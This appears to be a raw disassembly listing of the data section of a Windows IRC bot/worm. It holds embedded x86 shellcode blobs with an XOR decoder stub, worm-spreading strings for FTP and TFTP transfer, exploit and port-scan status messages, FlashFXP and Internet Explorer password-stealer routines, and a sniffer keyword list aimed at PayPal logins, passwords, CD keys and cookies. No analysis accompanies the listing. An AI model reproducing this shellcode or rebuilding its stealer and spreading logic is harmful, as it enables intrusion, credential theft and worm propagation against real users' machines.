a231 db '231 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B:loc_4119BA�o
a221 db '221 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B+843�o
dword_41C514 dd 135A78h ; DATA XREF: sub_41113B+834�r
align 10h
unk_41C520 db 2Dh ; - ; DATA XREF: sub_41113B+80D�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TransferToSC db '- %u. Transfer to %s complete.',0
aFtp_0 db 'ftp',0 ; DATA XREF: sub_41113B+808�o
dword_41C54C dd 157728h ; DATA XREF: sub_41113B+73E�r
dd 2 dup(0)
dword_41C558 dd 20363232h, 0A0D2Dh ; DATA XREF: sub_41113B+6F7�o
; sub_41113B+7AA�o
aX32000Fh1024Ja db '-x 3 2000 fh 1024 Jan 1 0:00 .',0Dh,0Ah ; DATA XREF: sub_41113B+6AF�o
db 'drwxr-xr-x 3 2000 fh 1024 Jan 1 0:00 ..',0Dh,0Ah
db '-rwxr-xr-x 3 2000 fh %u Jan 1 0:00 %s',0Dh,0Ah,0
align 4
a150 db '150 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B+5C7�o
; sub_41113B+751�o
dword_41C5DC dd 146AF8h ; DATA XREF: sub_41113B+5B4�r
dd 2 dup(0)
dword_41C5E8 dd 20333132h, 0A0D7525h, 0 ; DATA XREF: sub_41113B+56D�o
dword_41C5F4 dd 1227B0h ; DATA XREF: sub_41113B+4ED�r
align 10h
aUUUUUU db '%u,%u,%u,%u,%u,%u',0 ; DATA XREF: sub_41113B+427�o
align 4
dword_41C614 dd 0F6578h ; DATA XREF: sub_41113B+3EA�r
align 10h
dword_41C620 dd 20353234h, 0A0D2Dh ; DATA XREF: sub_41113B+3A3�o
dword_41C628 dd 0FED08h ; DATA XREF: sub_41113B+394�r
dd 2 dup(0)
dword_41C634 dd 20303032h, 0A0D2Dh ; DATA XREF: sub_41113B+34D�o
; sub_41113B+4A6�o
dword_41C63C dd 128230h ; DATA XREF: sub_41113B+33E�r
dd 2 dup(0)
dword_41C648 dd 20373532h, 20222F22h, 0A0D2Dh ; DATA XREF: sub_41113B+2F7�o
dword_41C654 dd 1F738h ; DATA XREF: sub_41113B+2E8�r
dd 0
dword_41C65C dd 20313132h, 0A0D2Dh ; DATA XREF: sub_41113B+2A1�o
dword_41C664 dd 1232B8h ; DATA XREF: sub_41113B+292�r
align 10h
dword_41C670 dd 20353132h, 0A0D2Dh ; DATA XREF: sub_41113B+24B�o
dword_41C678 dd 124AF8h ; DATA XREF: sub_41113B+23C�r
dd 2 dup(0)
dword_41C684 dd 20303332h, 0A0D2Dh ; DATA XREF: sub_41113B+1E1�o
dword_41C68C dd 0FECD8h ; DATA XREF: sub_41113B+1C8�r
dd 2 dup(0)
dword_41C698 dd 20313333h, 0A0D2Dh ; DATA XREF: sub_41113B+181�o
dword_41C6A0 dd 163AE8h ; DATA XREF: sub_41113B+16B�r
dd 2 dup(0)
dword_41C6AC dd 0A0D20h ; DATA XREF: sub_41113B+E9�o
; sub_41113B+115�o ...
dword_41C6B0 dd 20303232h, 0A0D2Dh ; DATA XREF: sub_41113B+13�o
dword_41C6B8 dd 303332h ; DATA XREF: sub_411A09+193�o
dword_41C6BC dd 53534150h, 0A0D3120h, 0 ; DATA XREF: sub_411A09+11D�o
dword_41C6C8 dd 313333h ; DATA XREF: sub_411A09+F9�o
dword_41C6CC dd 52455355h, 0A0D3120h, 0 ; DATA XREF: sub_411A09:loc_411A8A�o
dword_41C6D8 dd 303232h ; DATA XREF: sub_411A09+63�o
unk_41C6DC db 2Dh ; - ; DATA XREF: sub_411BBC+115�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningFtpWorm db '- Running FTP wormride thread',0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_411BBC+6E�o
align 10h
aFtpWormrideThr db 'FTP wormride thread',0 ; DATA XREF: sub_411D68+36�o
dword_41C724 dd 4000500h, 7868746Bh, 0 ; DATA XREF: sub_411DC5+5E2�o
unk_41C730 db 2Dh ; - ; DATA XREF: sub_411DC5+5BD�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TftpTransfer db '- %u. tftp transfer to %s complete.',0
align 10h
aWormride db 'wormride',0 ; DATA XREF: sub_411DC5+5B8�o
align 4
dword_41C76C dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_411DC5+367�o
aOctet db 'octet',0 ; DATA XREF: sub_411DC5+333�o
; sub_411DC5+345�o
align 4
unk_41C788 db 2Dh ; - ; DATA XREF: sub_411DC5+144�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningTftpWor db '- Running TFTP wormride thread',0
aTftpWormrideTh db 'TFTP wormride thread',0 ; DATA XREF: sub_4123F6+2B�o
align 4
loc_41C7C8: ; DATA XREF: sub_4125DF+50�o
jmp short loc_41C7DF
; ---------------------------------------------------------------------------
loc_41C7CA: ; CODE XREF: .data:loc_41C7DF�p
mov ecx, 0
xor ecx, 0
pop esi
loc_41C7D6: ; CODE XREF: .data:0041C7DB�j
xor byte ptr [ecx+esi-1], 0
loop loc_41C7D6
jmp short near ptr dword_41C7E4
; ---------------------------------------------------------------------------
loc_41C7DF: ; CODE XREF: .data:loc_41C7C8�j
call loc_41C7CA
; ---------------------------------------------------------------------------
dword_41C7E4 dd 0 ; CODE XREF: .data:0041C7DD�j
dword_41C7E8 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+CB�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 6853h, 2680000h, 8B000000h, 6AD88BD4h, 0BA535210h, 5A603063h
dd 0B450D6FFh, 53555002h, 605800BAh, 0BFD6FFE2h, 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41C89C dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+8C�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 2685353h, 8B000000h, 6AD88BD4h, 0BA535210h, 0C2A69000h
dd 5040D6FFh, 3B7ABA53h, 0D6FFA173h, 0BA535050h, 69D310h
dd 0D88BD6FFh, 0B450C033h, 53555002h, 605800BAh, 0BFD6FFE2h
dd 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41C964 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+36�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 6AEC8B00h, 55544310h, 7232BA53h
dd 0D6FF1979h, 27D8166h, 0ED751111h, 22047D81h, 75222222h
dd 2B450E4h, 0BA535550h, 0E2605800h, 7D81D6FFh, 20EC8300h
dd 0BFEA758Bh, 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41CA18 dd 8B20EC83h, 45D89ECh, 81007D89h, 200ECh, 14658900h, 8B64DB33h
; DATA XREF: sub_412720+71�o
dd 408B3043h, 1C708B0Ch, 8788BADh, 0E8087D89h, 45h, 5F8B5653h
dd 3B5C8B3Ch, 53DF0378h, 3205B8Bh, 0C38353DFh, 3338B04h
dd 0ACC933F7h, 0C1C1C832h, 75C08405h, 75CA2BF6h, 0D82B58E9h
dd 35EEBD1h, 0DF03245Eh, 8B0B8B66h, 0DF031C5Eh, 38B048Bh
dd 0FF5B5EC7h, 33685EE0h, 68000032h, 5F327377h, 6E92BA54h
dd 0D6FF8404h, 8B0C4589h, 46A53F8h, 475FF55h, 669000BAh
dd 83D6FFE0h, 850F04F8h, 0C5h, 0E8087D8Bh, 0Dh, 3 dup(0)
dd 18458F00h, 6A026A53h, 68535301h, 0C0000000h, 0BA1875FFh
dd 5C6BD33Dh, 4589D6FFh, 840F401Ch, 8Dh, 330C7D8Bh, 2B450C0h
dd 1475FF50h, 0BA0475FFh, 0E2605800h, 7D8BD6FFh, 74C08508h
dd 41C88B1Eh, 8D535774h, 5051104Dh, 0FF1475FFh, 0B9BA1C75h
dd 0FFCBF5BEh, 74C085D6h, 0FFC5EB40h, 5CBA1C75h, 0FF9DC593h
dd 58446AD6h, 0FC8BE02Bh, 33ABD78Bh, 59106AC0h, 8BFDE2ABh
dd 5252087Dh, 50505050h, 0FF505050h, 2CBA1875h, 0FF2694F1h
dd 0C7FE58D6h, 1BA5053h, 0FFDE34D6h, 1C75FFD6h, 0C5935CBAh
dd 0FFD6FF9Dh, 3DBA1875h, 0FF27CF53h, 0C7D8BD6h, 0BA0475FFh
dd 7315685h, 7D8BD6FFh, 46BABA08h, 0D6FFC10Ch
db 0
byte_41CB95 db 0E3h ; DATA XREF: sub_4125DF+CF�r
; sub_4125DF+E4�w
align 4
dword_41CB98 dd 4113E68Bh ; DATA XREF: sub_4125DF+60�r
; sub_4125DF+75�w
align 10h
off_41CBA0 dd offset dword_41CC4C ; DATA XREF: sub_4127D0+77�r
dd offset dword_41CC40
dd 0
dd offset dword_41CC2C
dd offset dword_41CC20
align 8
or ah, cl
inc ecx
add ah, bh
retf
; ---------------------------------------------------------------------------
dw 41h
dd 0
dd offset dword_41CBE8
dd offset dword_41CBDC
dd 4 dup(0)
dword_41CBDC dd 808FD6DAh, 2 dup(0) ; DATA XREF: .data:0041CBC8�o
; .data:0041DA90�o
dword_41CBE8 dd 0DB999E9Ah, 0D5ABC9FCh, 0BEB1F3E6h, 2 dup(0) ; DATA XREF: .data:0041CBC4�o
; .data:0041DA8C�o
dd 8284D6D3h, 0A9h, 0
dd 0DE999E9Ah, 0DFA09EFCh, 0FDA4EAACh, 0DE91BB92h, 2 dup(0)
dword_41CC20 dd 808ED7D7h, 2 dup(0) ; DATA XREF: .data:0041CBB0�o
; .data:0041DA78�o
dword_41CC2C dd 0C3999E9Ah, 0DBBA96ECh, 0BAF0FDA9h, 98B395h, 0
; DATA XREF: .data:0041CBAC�o
; .data:0041DA74�o
dword_41CC40 dd 8381DED3h, 2 dup(0) ; DATA XREF: .data:0041CBA4�o
; .data:off_41DA6C�o
dword_41CC4C dd 0D5999E9Ah, 0CCAB8EF3h, 0B6ACF5A0h, 0CB9EB7D5h, 2 dup(0)
; DATA XREF: .data:off_41CBA0�o
; .data:off_41DA68�o
dword_41CC64 dd 72h ; DATA XREF: sub_412A3A:loc_412B93�o
dword_41CC68 dd 62h ; DATA XREF: sub_412BC9:loc_412D11�o
dword_41CC6C dd 63h ; DATA XREF: sub_412D56:loc_412DC8�o
dword_41CC70 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: sub_412E04+64�o
dd 6C6C6568h, 65646F63h, 72657320h, 20726576h, 70206E6Fh
dd 2074726Fh, 2343003h, 2037325h, 0
dword_41CCA8 dd 6C656853h, 646F636Ch, 65732065h, 72657672h, 206E6F20h
; DATA XREF: sub_412F07+98�o
dd 74726F70h, 34300320h, 3752502h, 2, 0
byte_41CCD0 db 86h ; DATA XREF: sub_41294E+3C�o
; sub_41294E+4C�o ...
db 85h, 0D8h, 0DDh
dd 0AFh, 2 dup(0)
dd 0D3000000h, 82D5h, 3 dup(0)
db 2 dup(0)
dword_41CCF6 dd 9BA268F6h ; DATA XREF: sub_41294E+2B�r
; sub_412FC6+31�r ...
dword_41CCFA dd 0 ; DATA XREF: sub_412FC6+57�w
; sub_414052+B5�r ...
off_41CCFE dd offset sub_410649 ; DATA XREF: sub_41294E+1C�r
; sub_412FC6+18�r ...
dw 3
dd 0
dd 838C0000h, 8EFCC0C3h, 0A6h, 2 dup(0)
dd 82D2D600h, 4 dup(0)
dd 0A1BA32Eh, 0
dd 410B52h, 3, 10h dup(0)
dword_41CD80 dd 6E695728h, 293233h ; DATA XREF: sub_41308F+217�o
dword_41CD88 dd 696E5528h, 2978h ; DATA XREF: sub_41308F+1F1�o
dword_41CD90 dd 63617041h, 252F6568h, 75h ; DATA XREF: sub_41308F+1DF�o
aApache db 'Apache',0 ; DATA XREF: sub_41308F+1B9�o
align 4
aMicrosoftIisU_ db 'Microsoft-IIS/%u.%u',0 ; DATA XREF: sub_41308F+130�o
aMicrosoftIis db 'Microsoft-IIS',0 ; DATA XREF: sub_41308F+FC�o
align 4
aServer db 'Server:',0 ; DATA XREF: sub_41308F+7A�o
aOptionsHttp1_0 db 'OPTIONS / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41308F+B�o
db 0Dh,0Ah,0
align 4
unk_41CDE8 db 53h ; S ; DATA XREF: sub_41349C+5E4�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 3
db 30h, 34h, 2
db 25h ; %
db 73h, 3, 2
db 3Ah ; :
db 25h, 73h, 20h
db 69h ; i
db 6Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 30h ; 0
db 2Eh, 32h, 66h
db 3
db 2, 73h, 65h
db 63h ; c
db 2Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aOpenIpSFound db 'open IP(s) found',0
align 4
dword_41CE2C dd 2343003h, 2037325h, 2073253Ah, 6F207369h, 6E6570h
; DATA XREF: sub_41349C+55E�o
dword_41CE40 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: sub_41349C+343�o
dd 2343003h, 2037325h, 2073253Ah, 20726F66h, 2343003h
dd 2037525h, 63657320h, 28646E6Fh, 2973h
dword_41CE78 dd 6E616353h, 676E696Eh, 34300320h, 3732502h, 73253A02h
; DATA XREF: sub_41349C+305�o
dd 726F6620h, 34300320h, 3752502h, 65732002h, 646E6F63h
dd 297328h
unk_41CEA4 db 53h ; S ; DATA XREF: sub_413AB0+1DC�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 69h, 6Eh, 67h
db 20h
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
db 3Ah, 25h, 73h
db 20h
db 66h, 6Fh, 72h
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aSecondSTUSU db ' second(s), t:%u s:%u',0
align 4
dword_41CEDC dd 3430032Dh, 3752502h, 41202D02h, 6D657474h, 64657470h
; DATA XREF: sub_413CB3+30E�o
dd 34300320h, 3752502h, 78652002h, 696F6C70h, 69746174h
dd 73286E6Fh, 6E6F2029h, 34300320h, 3752502h, 50492002h
dd 2E297328h, 0
dword_41CF20 dd 65747441h, 6974706Dh, 7420676Eh, 7865206Fh, 696F6C70h
; DATA XREF: sub_413CB3+2B0�o
dd 30032074h, 73250234h, 77200203h, 20687469h, 2343003h
dd 2037325h, 2E2E2Eh
unk_41CF50 db 2Dh ; - ; DATA XREF: sub_413CB3+31�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aAttemptingTo_0 db '- Attempting to exploit IP',27h,'s in list.',0
align 10h
aAttemptingToEx db 'Attempting to exploit IP',27h,'s in list.',0 ; DATA XREF: sub_413FE7+52�o
dword_41CFA4 dd 3003203Ah, 75250234h, 202E0203h, 0 ; DATA XREF: sub_414052+BB�o
aExploitStatist db 'Exploit statistics - ',0 ; DATA XREF: sub_414052+29�o
align 4
aListingExploit db 'Listing exploit statistics',0 ; DATA XREF: sub_41417D+2B�o
align 4
dword_41CFE8 dd 62616E55h, 7420656Ch, 6F63206Fh, 63656E6Eh, 6F742074h
; DATA XREF: sub_4141C1+D8�o
dd 34300320h, 3732502h, 6F702002h, 3207472h, 25023430h
dd 2E020373h, 0
dword_41D018 dd 656D6954h, 2074756Fh, 7563636Fh, 20646572h, 6C696877h
; DATA XREF: sub_4141C1+B4�o
dd 6F632065h, 63656E6Eh, 676E6974h, 206F7420h, 2343003h
dd 2037325h, 3430033Ah, 3732502h, 202E02h
dword_41D050 dd 6E6E6F43h, 65746365h, 6F742064h, 34300320h, 3732502h
; DATA XREF: sub_4141C1+78�o
dd 30033A02h, 73250234h, 69200203h, 3003206Eh, 75250234h
dd 203736Dh, 2Eh
dword_41D080 dd 6E6E6F43h, 69746365h, 7420676Eh, 7325206Fh, 726F7020h
; DATA XREF: sub_4142BF+D8�o
dd 30032074h, 73250234h, 203h
unk_41D0A0 db 53h ; S ; DATA XREF: sub_4143B0+221�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 25h ; %
db 73h, 20h, 69h
db 6Eh ; n
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 30h
db 2Eh ; .
db 32h, 66h, 3
db 2
db 73h, 65h, 63h
db 2Eh ; .
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 20h, 6Fh
aPenPortSFound db 'pen port(s) found',0
align 4
dword_41D0DC dd 33A7325h, 25023430h, 20020373h, 6F207369h, 6E6570h
; DATA XREF: sub_4143B0+1BA�o
dword_41D0F0 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: sub_4143B0+81�o
dd 70207325h, 2074726Fh, 2343003h, 2037525h, 3430032Dh
dd 3752502h, 69772002h, 3206874h, 25023430h, 20020375h
dd 6B636F73h, 73287465h, 29h
dword_41D138 dd 6E616353h, 676E696Eh, 20732520h, 74726F70h, 34300320h
; DATA XREF: sub_414600+1BE�o
dd 3752502h, 30032D02h, 75250234h, 77200203h, 20687469h
dd 2343003h, 2037525h, 636F7320h, 2874656Bh, 2973h
aYa36za48dehfrv db 'yA36zA48dEhfrvghGRg57h5UlDv3',0 ; DATA XREF: sub_4147E5+6�o
; sub_4147E5+C6�o
align 4
aSflashfxpSites db '%sFlashFXP\sites.dat',0 ; DATA XREF: sub_4148CE+107�o
align 4
aFlashfxpSites_ db '\FlashFXP\sites.dat',0 ; DATA XREF: sub_4148CE+B6�o
aProgramfiles db 'ProgramFiles',0 ; DATA XREF: sub_4148CE+AB�o
align 10h
aSites_dat db 'sites.dat',0 ; DATA XREF: sub_4148CE:loc_414945�o
align 4
aFlashfxp_exe1 db 'FlashFXP.exe %1',0 ; DATA XREF: sub_4148CE+57�o
aSoftwareClasse db 'SOFTWARE\Classes\Applications\FlashFXP.exe\shell\open\command',0
; DATA XREF: sub_4148CE+15�o
align 4
unk_41D22C db 2Dh ; - ; DATA XREF: sub_414A1E+464�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 69h ; i
db 73h, 74h, 65h
db 64h ; d
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 2Fh, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aFlashfxpPass_0 db 'FlashFXP password(s).',0
align 4
dword_41D268 dd 2343003h, 2037525h ; DATA XREF: sub_414A1E+3C4�o
a_FlashfxpFtpSS db '. FlashFXP - ftp://%s:%s@%s:%s - %s',0
aPass127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+352�o
db 'Pass=%127s',0Dh,0Ah,0
align 4
aUser127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+338�o
db 'User=%127s',0Dh,0Ah,0
align 4
aPort127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+31E�o
db 'Port=%127s',0Dh,0Ah,0
align 4
aIp127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+304�o
db 'IP=%127s',0Dh,0Ah,0
align 4
asc_41D2D4 db '[%[^]]]',0Dh,0Ah,0 ; DATA XREF: sub_414A1E+2EA�o
align 10h
aPass_0 db 0Dh,0Ah ; DATA XREF: sub_414A1E+1F4�o
db 'Pass=',0
aUser_0 db 0Dh,0Ah ; DATA XREF: sub_414A1E+1DC�o
db 'User=',0
aPort db 0Dh,0Ah ; DATA XREF: sub_414A1E+1C4�o
db 'Port=',0
aIp db 0Dh,0Ah ; DATA XREF: sub_414A1E+1AC�o
db 'IP=',0
align 10h
asc_41D300 db 0Dh,0Ah ; DATA XREF: sub_414A1E:loc_414BA6�o
db 0Dh,0Ah
db '[',0
align 4
unk_41D308 db 2Dh ; - ; DATA XREF: sub_414A1E+55�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aListingFlashfx db '- Listing FlashFXP passwords',0
align 10h
aFlashfxpPasswo db 'FlashFXP password stealer',0 ; DATA XREF: sub_414EB0+2B�o
align 4
unk_41D34C db 2Dh ; - ; DATA XREF: sub_414EF4+B8A�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 69h ; i
db 73h, 74h, 65h
db 64h ; d
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 20h, 69h
aNternetExplore db 'nternet explorer password(s).',0
align 4
dword_41D388 dd 2343003h, 2037525h, 4549202Eh, 7475413Ah, 6D6F436Fh
; DATA XREF: sub_414EF4+AD8�o
dd 74656C70h, 61502065h, 6F777373h, 20736472h, 6953202Dh
dd 203A6574h, 2343003h, 2037325h, 614E202Eh, 203A656Dh
dd 2343003h, 2037325h, 6150202Eh, 6F777373h, 203A6472h
dd 2343003h, 2037325h, 2Eh
dword_41D3E4 dd 2343003h, 2037525h, 4549202Eh, 7475413Ah, 6F43206Fh
; DATA XREF: sub_414EF4+A2B�o
dd 656C706Dh, 66206574h, 646C6569h, 202D2073h, 6C656946h
dd 3203A64h, 25023430h, 2E020373h, 74614420h, 3203A61h
dd 25023430h, 2E020373h, 0
dword_41D42C dd 70747468h, 2F3A73h ; DATA XREF: sub_414EF4+9DD�o
dword_41D434 dd 70747468h, 2F3Ah ; DATA XREF: sub_414EF4+9C6�o
dword_41D43C dd 7274533Ah, 676E69h ; DATA XREF: sub_414EF4+983�o
; sub_414EF4+99A�o
aStringindex db 'StringIndex',0 ; DATA XREF: sub_414EF4+968�o
aE161255a db 'e161255a',0 ; DATA XREF: sub_414EF4:loc_415842�o
align 4
dword_41D45C dd 2343003h, 2037525h, 534D202Eh, 7845204Eh, 726F6C70h
; DATA XREF: sub_414EF4+935�o
dd 2D207265h, 4E534D20h, 3A444920h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h
dword_41D49C dd 2Ch ; DATA XREF: sub_414EF4+83B�o
; sub_414EF4+852�o ...
aB9819c52 db 'b9819c52',0 ; DATA XREF: sub_414EF4:loc_4155CE�o
align 4
dword_41D4AC dd 2343003h, 2037525h, 4549202Eh, 7361503Ah, 726F7773h
; DATA XREF: sub_414EF4+6C6�o
dd 72502D64h, 6365746Fh, 20646574h, 6953202Dh, 203A6574h
dd 2343003h, 2037325h, 614E202Eh, 203A656Dh, 2343003h
dd 2037325h, 6150202Eh, 6F777373h, 203A6472h, 2343003h
dd 2037325h, 2Eh
a5e7e8100 db '5e7e8100',0 ; DATA XREF: sub_414EF4:loc_41550C�o
align 10h
dword_41D510 dd 2343003h, 2037525h, 754F202Eh, 6F6F6C74h, 7078456Bh
; DATA XREF: sub_414EF4+604�o
dd 73736572h, 4E202D20h, 3A656D61h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h
a220d5cc1 db '220d5cc1',0 ; DATA XREF: sub_414EF4+5C2�o
align 4
aWs db '%ws',0 ; DATA XREF: sub_414EF4+41C�o
asc_41D560 db '%x',0 ; DATA XREF: sub_414EF4+234�o
align 4
unk_41D564 db 2Dh ; - ; DATA XREF: sub_414EF4+1A9�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aListingInterne db '- Listing internet explorer passwords',0
align 8
dword_41D598 dd 5A6F1EC0h, 11D02DB1h, 0C000398Ch, 6B12D94Fh ; DATA XREF: sub_414EF4+123�o
; sub_414EF4+2C7�o ...
aInternetExplor db 'Internet explorer password stealer',0 ; DATA XREF: sub_415AF0+36�o
align 4
dword_41D5CC dd 65746E49h, 74736572h, 20676E69h, 636F7270h, 65737365h
; DATA XREF: sub_415B60+277�o
dd 202D2073h, 75736956h, 43206C61h, 36202B2Bh, 3003203Ah
dd 73250234h, 202E0203h, 65726E55h, 52496C61h, 203A4443h
dd 2343003h, 2037325h, 7453202Eh, 3A6D6165h, 34300320h
dd 3732502h, 57202E02h, 646C726Fh, 20664F20h, 63726157h
dd 74666172h, 3003203Ah, 73250234h, 202E0203h, 716E6F43h
dd 20726575h, 696C6E4Fh, 203A656Eh, 2343003h, 2037325h
dd 2Eh
aSoftwareValveS db 'Software\Valve\Steam',0 ; DATA XREF: sub_415B60+149�o
align 4
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual C++',0
; DATA XREF: sub_415B60+10A�o
align 4
aConquer db '[Conquer]',0 ; DATA XREF: sub_415B60:loc_415C2F�o
align 10h
aWorldOfWarcraf db 'World Of Warcraft',0 ; DATA XREF: sub_415B60:loc_415C0E�o
align 4
aUnreal3 db 'Unreal3',0 ; DATA XREF: sub_415B60+8C�o
aListingInteres db 'Listing interesting processes',0 ; DATA XREF: sub_415DFD+2B�o
align 4
off_41D6FC dd offset aUser_1 ; DATA XREF: sub_415EB7+32�o
; "user "
dd offset aUnknown_1 ; "unknown "
dd offset aPass_2 ; "pass "
dd offset aMailpass ; "MailPass "
dd offset aOper ; "oper "
dd 0
dd offset aIdentify ; "identify "
dd 0
dd offset aAuth_0 ; " :auth "
dd 0
dd offset aPasswd_0 ; "passwd="
dd 0
dd offset aUsername_0 ; "username="
dd 0
dd offset aPassword_0 ; "password="
dd 0
dd offset aLogin_1 ; "login="
dd 0
dd offset aPass_1 ; "pass="
dd 0
dd offset aPw ; "pw="
dd 2 dup(0)
off_41D758 dd offset aLogin_0 ; DATA XREF: sub_415EB7+54�o
; "login "
align 10h
dd offset aSxt ; "sxt "
align 8
dd offset aAuth ; "auth "
align 10h
dd offset aPasswort ; "passwort "
align 8
dd offset aCdkey ; "cdkey"
align 10h
dd offset aCdKey_0 ; "cd-key"
align 8
dd offset aCdKey ; "cd key"
align 10h
dd offset aPassword ; "password"
align 8
dd offset aPaypal_com ; "paypal.com"
align 10h
dd offset aPaypal ; "paypal"
align 8
dd offset aIrcOperator ; "irc operator"
dd 0
dd offset aLP ; "l/p"
align 8
dd offset aSsh1_5 ; "SSH-1.5"
align 10h
dd offset aSsh1_99 ; "SSH-1.99"
dd 2 dup(0)
off_41D7CC dd offset aSetCookie ; DATA XREF: sub_415EB7+76�o
; "Set-Cookie:"
dd 0
dd offset aSyn ; "syn"
dd 0
dd offset aFlood ; "flood "
dd 0
dd offset aClone ; "clone "
dd 0
dd offset aServU_0 ; "serv-u"
dd 0
dd offset aServU ; "serv u"
dd 0
dd offset aServu ; "servu"
dd 0
dd offset aDdos ; "ddos"
align 10h
off_41D810 dd offset dword_41D86C ; DATA XREF: sub_415EB7+98�o
align 8
dd offset dword_41D864
align 10h
dd offset dword_41D85C
align 8
dd offset dword_41D854
align 10h
dd offset dword_41D84C
align 8
dd offset dword_41D844
dd 2 dup(0)
dword_41D844 dd 54495551h, 20h ; DATA XREF: .data:0041D838�o
dword_41D84C dd 54524150h, 20h ; DATA XREF: .data:0041D830�o
dword_41D854 dd 4E494F4Ah, 20h ; DATA XREF: .data:0041D828�o
dword_41D85C dd 49504F54h, 2043h ; DATA XREF: .data:0041D820�o
dword_41D864 dd 49544F4Eh, 204543h ; DATA XREF: .data:0041D818�o
dword_41D86C dd 56495250h, 2047534Dh, 0 ; DATA XREF: .data:off_41D810�o
aDdos db 'ddos',0 ; DATA XREF: .data:0041D804�o
align 10h
aServu db 'servu',0 ; DATA XREF: .data:0041D7FC�o
align 4
aServU db 'serv u',0 ; DATA XREF: .data:0041D7F4�o
align 10h
aServU_0 db 'serv-u',0 ; DATA XREF: .data:0041D7EC�o
align 4
aClone db 'clone ',0 ; DATA XREF: .data:0041D7E4�o
align 10h
aFlood db 'flood ',0 ; DATA XREF: .data:0041D7DC�o
align 4
aSyn db 'syn',0 ; DATA XREF: .data:0041D7D4�o
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: .data:off_41D7CC�o
aSsh1_99 db 'SSH-1.99',0 ; DATA XREF: .data:0041D7C0�o
align 4
aSsh1_5 db 'SSH-1.5',0 ; DATA XREF: .data:0041D7B8�o
aLP db 'l/p',0 ; DATA XREF: .data:0041D7B0�o
aIrcOperator db 'irc operator',0 ; DATA XREF: .data:0041D7A8�o
align 10h
aPaypal db 'paypal',0 ; DATA XREF: .data:0041D7A0�o
align 4
aPaypal_com db 'paypal.com',0 ; DATA XREF: .data:0041D798�o
align 4
